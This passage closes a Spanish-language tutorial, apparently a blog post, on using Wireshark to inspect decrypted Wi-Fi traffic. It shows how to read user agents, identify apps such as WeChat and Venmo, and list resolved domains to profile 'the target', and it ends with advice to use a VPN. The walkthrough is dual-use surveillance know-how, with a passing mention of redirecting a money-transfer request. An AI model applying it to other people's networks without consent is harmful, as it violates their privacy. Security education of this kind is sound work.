A continuación, vemos el efecto de abrir Venmo y una aplicación para transferir dinero. Parece un buen momento para redirigir esta solicitud a otra parte.

2 paquetes HTTP

A continuación, podemos ver que hay varias solicitudes web inseguras usando el filtro de captura http . Estos filtros de captura contienen información como el agente de uso, que nos dirá el tipo de dispositivo que se está conectando. Podemos examinar esto haciendo clic en los paquetes y expandiendo la pestaña “Protocolo de transferencia de hipertexto”.

En este ejemplo, podemos ver solicitudes HTTP inseguras a un servidor de chat. ¿Qué diablos es esto? Simplemente examinar el paquete y resolver el dominio nos da la respuesta de inmediato. ¡Es WeChat! Este teléfono tiene instalado WeChat y, además, las comunicaciones que salen de él no están completamente encriptadas.

Si queremos ver todo lo que se resolvió, podemos hacer clic en la pestaña del menú “Estadísticas” y seleccionar “Direcciones resueltas” para ver todos los dominios que se resolvieron durante la captura. Esta debería ser una lista exhaustiva de servicios a los que el dispositivo se conecta a través de las aplicaciones que se ejecutan en él.

Este desglose hace que sea aún más fácil ver qué estaba haciendo el objetivo.

Wireshark hace de las redes Wi-Fi una cosa arriesgada en la que confiar

Este tipo de monitoreo puede parecer invasivo, pero debe tener en cuenta que su proveedor de servicios de Internet también mantiene un registro de esta información y tiene el derecho de venderla. Si desea evitar este tipo de espionaje, debe obtener una VPN como Mullvad o PIA que le permite ocultar incluso el tráfico local detrás de un cifrado seguro. En un lugar donde podría estar haciendo algo sensible a través de una conexión de datos, también debe considerar el uso de datos celulares siempre que sea posible para evitar este tipo de ataque.

¡Espero que hayas disfrutado de esta guía para usar Wireshark para espiar el tráfico de Wi-Fi! Si tiene alguna pregunta sobre este tutorial sobre descifrado de Wi-Fi, deje un comentario a continuación y no dude en comunicarse conmigo en Twitter @KodyKinzie .

Entradas más antiguas «